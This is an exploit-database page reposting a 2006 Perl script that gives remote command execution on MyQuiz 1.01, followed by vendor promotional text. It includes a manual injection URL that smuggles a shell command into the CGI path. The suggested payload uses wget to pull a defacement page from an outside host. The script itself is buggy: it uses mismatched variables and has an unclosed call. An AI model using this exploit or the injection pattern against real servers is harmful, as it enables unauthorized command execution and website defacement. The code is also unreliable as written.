Lucene search
K

myquiz101.pl.txt

🗓️ 08 Feb 2006 00:00:00Reported by Hessam-xType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

Perl exploit for MyQuiz 1.01 allows arbitrary command execution remotely with user input.

Code
`This Perl Exploit for MyQuiz 1.01 Arbitrary Command Execution Exploit.  
Athour : Hessam-x - www.hessamx.net  
+IHST : iran hackerz security team (hackerz.ir)  
  
#((Perl exploit))  
  
#!/usr/bin/perl  
# => MyQuiz Remote Command Execution Exploit  
# -> By Hessam-x / www.hackerz.ir  
# manual exploiting --> http://[target]/cgi-bin/myquiz.pl/ask/;<Command>|  
# Iran Hackerz Security Team  
# Hessam-x : www.hessamx.net  
use LWP::Simple;   
  
print "Target(www.example.com)\$ ";  
chomp($targ = <STDIN>);  
print "path: (/cgi-bin/)\$ \n";  
chomp($path=<STDIN>);  
print "command: (wget www.hackerz.ir/deface.htm)\$ \n";  
chomp($comd=<STDIN>);  
$page=get("http://".$targ.$patch) || die "[-] Unable to retrieve: $!";  
print "[+] Connected to: $targ\n";  
print "[~] Sending exploiting request, wait for some seconds/minutes...\n";  
get("http://".$ARGV[0].$ARGV[1]."\;".$comd."\|"  
print "[+] Exploiting request done!\n";  
print "Enjoy !";  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation